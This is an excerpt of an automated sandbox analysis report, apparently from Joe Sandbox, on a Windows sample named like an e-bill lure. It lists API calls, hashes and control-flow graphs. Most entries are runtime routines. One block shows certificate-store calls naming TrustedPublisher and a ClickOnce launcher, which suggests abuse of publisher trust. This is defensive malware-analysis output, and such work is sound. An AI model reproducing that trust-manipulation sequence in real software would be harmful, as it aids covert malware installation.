                                                                                                                                                  • Sleep.KERNELBASE(00009C40), ref: 009B11E8
                                                                                                                                                  • CertDeleteCertificateFromStore.CRYPT32(?), ref: 009B120B
                                                                                                                                                  • CertCloseStore.CRYPT32(?,00000000), ref: 009B121A
                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 009B1223
                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 009B1228
                                                                                                                                                  • LocalFree.KERNELBASE(?), ref: 009B122D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
                                                                                                                                                  • String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
                                                                                                                                                  • API String ID: 335784236-860318880
                                                                                                                                                  • Opcode ID: ee4d31c95088542f4692ac44e56fb38463349ce90b8e13d080c824c45a35f67a
                                                                                                                                                  • Instruction ID: 4d2c2d00c0f9c063e83ac9bc48582c14035b45f4b90caec6dc655cdb7a0a5aab
                                                                                                                                                  • Opcode Fuzzy Hash: ee4d31c95088542f4692ac44e56fb38463349ce90b8e13d080c824c45a35f67a
                                                                                                                                                  • Instruction Fuzzy Hash: 2D616F71A54218AFEB10AB94DE45FBFBBB9EF48B60F100115F614B72D0C7B199019BA4

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,009B364D,?,009C02E0,0000000C,009B37A4,?,00000002,00000000,?,009B3F66,00000003,009B209F,009B1AFC), ref: 009B3698
                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,009B364D,?,009C02E0,0000000C,009B37A4,?,00000002,00000000,?,009B3F66,00000003,009B209F,009B1AFC), ref: 009B369F
                                                                                                                                                  • ExitProcess.KERNEL32 ref: 009B36B1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                  • Opcode ID: 549e374821e3cbdfff138fec93c1686f3109f911f6ad63b5cdb54d2d85cebaa5
                                                                                                                                                  • Instruction ID: 46d5b5ae11390b102c7beef62cb1f300f182be20a3748483e6eb655ab5496317
                                                                                                                                                  • Opcode Fuzzy Hash: 549e374821e3cbdfff138fec93c1686f3109f911f6ad63b5cdb54d2d85cebaa5
                                                                                                                                                  • Instruction Fuzzy Hash: D5E0B631024548EFCF11BF54DF0ABAA3B69EF80365F008114FA559A271DBB5DE42DA50
                                                                                                                                                  APIs
                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 009B192B
                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 009B19F7
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009B1A10
                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 009B1A1A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 254469556-0
                                                                                                                                                  • Opcode ID: cd8c70af89ae5a31a5112b36d96b3972d0f82e67c3fb692529e8c5121e97d50a
                                                                                                                                                  • Instruction ID: 5c84a5509557f02c723818b8746b882a394e536e8f389f1bfcd4833b11b96537
                                                                                                                                                  • Opcode Fuzzy Hash: cd8c70af89ae5a31a5112b36d96b3972d0f82e67c3fb692529e8c5121e97d50a
                                                                                                                                                  • Instruction Fuzzy Hash: 91312A75D05218DBDF20EF64DA897CDBBB8EF08310F1041AAE40CAB254EB709A84CF45
                                                                                                                                                  APIs
                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 009B466B
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 009B4675
                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 009B4682
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                  • Opcode ID: 7a6853dfebfee40fa49a6bb06f75e91d5ad6412312480d098c579070ce8abbf1
                                                                                                                                                  • Instruction ID: ec2febcc4a598365d658b8a3c330c49e071318ca2eba542a61c7403858889280
                                                                                                                                                  • Opcode Fuzzy Hash: 7a6853dfebfee40fa49a6bb06f75e91d5ad6412312480d098c579070ce8abbf1
                                                                                                                                                  • Instruction Fuzzy Hash: B731B5749112289BCB21DF64D989BDDB7B8FF48320F5041EAE41CA7261E7709B858F45
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .
                                                                                                                                                  • API String ID: 0-248832578
                                                                                                                                                  • Opcode ID: 42e4a384974033e6c5ac393091bebb93abb48d7ffc15a37abefdd7022c7c8851
                                                                                                                                                  • Instruction ID: 5707ab72f68b8e6c5bb7ab700049ceab7023165c756085920aeb360f41ba2b60
                                                                                                                                                  • Opcode Fuzzy Hash: 42e4a384974033e6c5ac393091bebb93abb48d7ffc15a37abefdd7022c7c8851
                                                                                                                                                  • Instruction Fuzzy Hash: 2B310272800219AFCB249E78CD84FFEBBBDEB85324F0041A8F51897252E6309D409B90
                                                                                                                                                  APIs
                                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,009BA490,?,?,00000008,?,?,009BA130,00000000), ref: 009BA6C2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                                  • Opcode ID: 86291d26ec541f32ae26d1febcd4145551b911fbf49ff40d21c5aac7db885774
                                                                                                                                                  • Instruction ID: 58ea4d5f6d837ae02bd0cec5f2cc20c124efcf112522821a2ab7a4dc63c01153
                                                                                                                                                  • Opcode Fuzzy Hash: 86291d26ec541f32ae26d1febcd4145551b911fbf49ff40d21c5aac7db885774
                                                                                                                                                  • Instruction Fuzzy Hash: CEB17E71510608DFD715CF28C68ABA87BE0FF45374F298658E89ACF2A1C735DA82CB41
                                                                                                                                                  APIs
                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 009B1BEA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2325560087-0
                                                                                                                                                  • Opcode ID: f807debd7200f84660680ae83bcc24dfffb71cda177050c38748035ee7279ead
                                                                                                                                                  • Instruction ID: 6eff9a05043ccecce38ed42b5a2654978a147aa20134c81262ebfc8e709f1a6f
                                                                                                                                                  • Opcode Fuzzy Hash: f807debd7200f84660680ae83bcc24dfffb71cda177050c38748035ee7279ead
                                                                                                                                                  • Instruction Fuzzy Hash: 90519071E242098BDB19CF54D995BAEBBF8FB89360F248029C405EB295D374ED40CF54
                                                                                                                                                  APIs
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,009B1300), ref: 009B1AB1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                  • Opcode ID: 751f57634eaeb3bc201693fbe6f456a63b2448bda5ac12a65b7254676ae701c2
                                                                                                                                                  • Instruction ID: 5d0f0b2559e2391532f7f05bbda319c05542684bf9e1b3e97cebc6079a516b19
                                                                                                                                                  • Opcode Fuzzy Hash: 751f57634eaeb3bc201693fbe6f456a63b2448bda5ac12a65b7254676ae701c2
                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                  • Opcode ID: ed6df72e1b788fda054375b8c71cca2967693b0d64c0b29768885ee80ad16fee
                                                                                                                                                  • Instruction ID: 98158e94dbd0233a23aeb1d30ce06bdcc6bc1a7b1bced5fda19ac3f870dff1c5
                                                                                                                                                  • Opcode Fuzzy Hash: ed6df72e1b788fda054375b8c71cca2967693b0d64c0b29768885ee80ad16fee
                                                                                                                                                  • Instruction Fuzzy Hash: 29A02230B2C202CF8300CF38AF8A30C3AECAB00AE0B0B0028E008C00B0EB308080BF02

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 144 9b6507-9b651b 145 9b6589-9b6591 144->145 146 9b651d-9b6522 144->146 148 9b65d8-9b65f0 call 9b667a 145->148 149 9b6593-9b6596 145->149 146->145 147 9b6524-9b6529 146->147 147->145 150 9b652b-9b652e 147->150 158 9b65f3-9b65fa 148->158 149->148 152 9b6598-9b65d5 call 9b4869 * 4 149->152 150->145 153 9b6530-9b6538 150->153 152->148 156 9b653a-9b653d 153->156 157 9b6552-9b655a 153->157 156->157 160 9b653f-9b6551 call 9b4869 call 9b6078 156->160 163 9b655c-9b655f 157->163 164 9b6574-9b6588 call 9b4869 * 2 157->164 161 9b6619-9b661d 158->161 162 9b65fc-9b6600 158->162 160->157 172 9b661f-9b6624 161->172 173 9b6635-9b6641 161->173 168 9b6602-9b6605 162->168 169 9b6616 162->169 163->164 170 9b6561-9b6573 call 9b4869 call 9b6176 163->170 164->145 168->169 177 9b6607-9b6615 call 9b4869 * 2 168->177 169->161 170->164 180 9b6632 172->180 181 9b6626-9b6629 172->181 173->158 175 9b6643-9b6650 call 9b4869 173->175 177->169 180->173 181->180 188 9b662b-9b6631 call 9b4869 181->188 188->180
                                                                                                                                                  APIs
                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 009B654B
                                                                                                                                                    • Part of subcall function 009B6078: _free.LIBCMT ref: 009B6095
                                                                                                                                                    • Part of subcall function 009B6078: _free.LIBCMT ref: 009B60A7
                                                                                                                                                    • Part of subcall function 009B6078: _free.LIBCMT ref: 009B60B9
                                                                                                                                                    • Part of subcall function 009B6078: _free.LIBCMT ref: 009B60CB
                                                                                                                                                    • Part of subcall function 009B6078: _free.LIBCMT ref: 009B60DD
                                                                                                                                                    • Part of subcall function 009B6078: _free.LIBCMT ref: 009B60EF
                                                                                                                                                    • Part of subcall function 009B6078: _free.LIBCMT ref: 009B6101
                                                                                                                                                    • Part of subcall function 009B6078: _free.LIBCMT ref: 009B6113
                                                                                                                                                    • Part of subcall function 009B6078: _free.LIBCMT ref: 009B6125
                                                                                                                                                    • Part of subcall function 009B6078: _free.LIBCMT ref: 009B6137
                                                                                                                                                    • Part of subcall function 009B6078: _free.LIBCMT ref: 009B6149
                                                                                                                                                    • Part of subcall function 009B6078: _free.LIBCMT ref: 009B615B
                                                                                                                                                    • Part of subcall function 009B6078: _free.LIBCMT ref: 009B616D
                                                                                                                                                  • _free.LIBCMT ref: 009B6540
                                                                                                                                                    • Part of subcall function 009B4869: HeapFree.KERNEL32(00000000,00000000,?,009B620D,?,00000000,?,00000000,?,009B6234,?,00000007,?,?,009B669F,?), ref: 009B487F
                                                                                                                                                    • Part of subcall function 009B4869: GetLastError.KERNEL32(?,?,009B620D,?,00000000,?,00000000,?,009B6234,?,00000007,?,?,009B669F,?,?), ref: 009B4891
                                                                                                                                                  • _free.LIBCMT ref: 009B6562
                                                                                                                                                  • _free.LIBCMT ref: 009B6577
                                                                                                                                                  • _free.LIBCMT ref: 009B6582
                                                                                                                                                  • _free.LIBCMT ref: 009B65A4
                                                                                                                                                  • _free.LIBCMT ref: 009B65B7
                                                                                                                                                  • _free.LIBCMT ref: 009B65C5
                                                                                                                                                  • _free.LIBCMT ref: 009B65D0
                                                                                                                                                  • _free.LIBCMT ref: 009B6608
                                                                                                                                                  • _free.LIBCMT ref: 009B660F
                                                                                                                                                  • _free.LIBCMT ref: 009B662C
                                                                                                                                                  • _free.LIBCMT ref: 009B6644
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                  • Opcode ID: 6d50835d5c4d0bc375f8e5a79b77fc12bce0689b22e6e0bdbfa83e32cb2fa5e5
                                                                                                                                                  • Instruction ID: c5e5d7d30e408b49c744e5d4e9dd7b9e849e8fd8bee1478251ec80fe27f9f30c
                                                                                                                                                  • Opcode Fuzzy Hash: 6d50835d5c4d0bc375f8e5a79b77fc12bce0689b22e6e0bdbfa83e32cb2fa5e5
                                                                                                                                                  • Instruction Fuzzy Hash: 40313B71600304DFEB71AA7ADA05BEA73F8AB80320F14442AF449DB192DE79FD50DB50

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 201 9b4330-9b4341 202 9b434d-9b43d8 call 9b4869 * 9 call 9b41f6 call 9b4246 201->202 203 9b4343-9b434c call 9b4869 201->203 203->202
                                                                                                                                                  APIs
                                                                                                                                                  • _free.LIBCMT ref: 009B4344
                                                                                                                                                    • Part of subcall function 009B4869: HeapFree.KERNEL32(00000000,00000000,?,009B620D,?,00000000,?,00000000,?,009B6234,?,00000007,?,?,009B669F,?), ref: 009B487F
                                                                                                                                                    • Part of subcall function 009B4869: GetLastError.KERNEL32(?,?,009B620D,?,00000000,?,00000000,?,009B6234,?,00000007,?,?,009B669F,?,?), ref: 009B4891
                                                                                                                                                  • _free.LIBCMT ref: 009B4350
                                                                                                                                                  • _free.LIBCMT ref: 009B435B
                                                                                                                                                  • _free.LIBCMT ref: 009B4366
                                                                                                                                                  • _free.LIBCMT ref: 009B4371
                                                                                                                                                  • _free.LIBCMT ref: 009B437C
                                                                                                                                                  • _free.LIBCMT ref: 009B4387
                                                                                                                                                  • _free.LIBCMT ref: 009B4392
                                                                                                                                                  • _free.LIBCMT ref: 009B439D
                                                                                                                                                  • _free.LIBCMT ref: 009B43AB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                  • Opcode ID: 0af63c769485df3d32e0ed8a166e56f3b172c95757b3854ad894d288a046ce7c
                                                                                                                                                  • Instruction ID: dc29bc16639e17ea54553d13fd529e929d5553f201d0e052c0a19ffe64736e2d
                                                                                                                                                  • Opcode Fuzzy Hash: 0af63c769485df3d32e0ed8a166e56f3b172c95757b3854ad894d288a046ce7c
                                                                                                                                                  • Instruction Fuzzy Hash: 25118976600148FFCB41EF96DA42DD93BB5EF84760F5141A6FA084F163DA31DE50AB80

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 228 9b7ab4-9b7acd 229 9b7acf-9b7adf call 9b82cc 228->229 230 9b7ae3-9b7ae8 228->230 229->230 237 9b7ae1 229->237 232 9b7aea-9b7af2 230->232 233 9b7af5-9b7b19 MultiByteToWideChar 230->233 232->233 235 9b7b1f-9b7b2b 233->235 236 9b7cac-9b7cbf call 9b123a 233->236 238 9b7b7f 235->238 239 9b7b2d-9b7b3e 235->239 237->230 242 9b7b81-9b7b83 238->242 243 9b7b5d-9b7b63 239->243 244 9b7b40-9b7b4f call 9bac20 239->244 246 9b7b89-9b7b9c MultiByteToWideChar 242->246 247 9b7ca1 242->247 245 9b7b64 call 9b62ff 243->245 244->247 253 9b7b55-9b7b5b 244->253 250 9b7b69-9b7b6e 245->250 246->247 251 9b7ba2-9b7bbd call 9b5a15 246->251 252 9b7ca3-9b7caa call 9b646a 247->252 250->247 254 9b7b74 250->254 251->247 260 9b7bc3-9b7bca 251->260 252->236 257 9b7b7a-9b7b7d 253->257 254->257 257->242 261 9b7bcc-9b7bd1 260->261 262 9b7c04-9b7c10 260->262 261->252 265 9b7bd7-9b7bd9 261->265 263 9b7c5c 262->263 264 9b7c12-9b7c23 262->264 266 9b7c5e-9b7c60 263->266 268 9b7c3e-9b7c44 264->268 269 9b7c25-9b7c34 call 9bac20 264->269 265->247 267 9b7bdf-9b7bf9 call 9b5a15 265->267 270 9b7c9a-9b7ca0 call 9b646a 266->270 271 9b7c62-9b7c7b call 9b5a15 266->271 267->252 281 9b7bff 267->281 274 9b7c45 call 9b62ff 268->274 269->270 283 9b7c36-9b7c3c 269->283 270->247 271->270 285 9b7c7d-9b7c84 271->285 279 9b7c4a-9b7c4f 274->279 279->270 284 9b7c51 279->284 281->247 286 9b7c57-9b7c5a 283->286 284->286 287 9b7cc0-9b7cc6 285->287 288 9b7c86-9b7c87 285->288 286->266 289 9b7c88-9b7c98 WideCharToMultiByte 287->289 288->289 289->270 290 9b7cc8-9b7ccf call 9b646a 289->290 290->252
                                                                                                                                                  APIs
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,009B54C8,00000000,?,?,?,009B7D05,?,?,00000100), ref: 009B7B0E
                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 009B7B46
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,009B7D05,?,?,00000100,5EFC4D8B,?,?), ref: 009B7B94
                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 009B7C2B
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009B7C8E
                                                                                                                                                  • __freea.LIBCMT ref: 009B7C9B
                                                                                                                                                    • Part of subcall function 009B62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,009B7E5B,?,00000000,?,009B686F,?,00000004,00000000,?,?,?,009B3BCD), ref: 009B6331
                                                                                                                                                  • __freea.LIBCMT ref: 009B7CA4
                                                                                                                                                  • __freea.LIBCMT ref: 009B7CC9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2597970681-0
                                                                                                                                                  • Opcode ID: fc9cf0e005a4be03d3bc6089774fc07f0864ee7c3ec724693ec6b70d751a585e
                                                                                                                                                  • Instruction ID: 7dbe270698c829fd530a01baacd75a06e46b99cf20a28fa7800f529ad030ca05
                                                                                                                                                  • Opcode Fuzzy Hash: fc9cf0e005a4be03d3bc6089774fc07f0864ee7c3ec724693ec6b70d751a585e
                                                                                                                                                  • Instruction Fuzzy Hash: 3351A07261421AABDB259EA4CE41FFBBBAAEB84770F15472CF804D6240EB74DC40D690

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
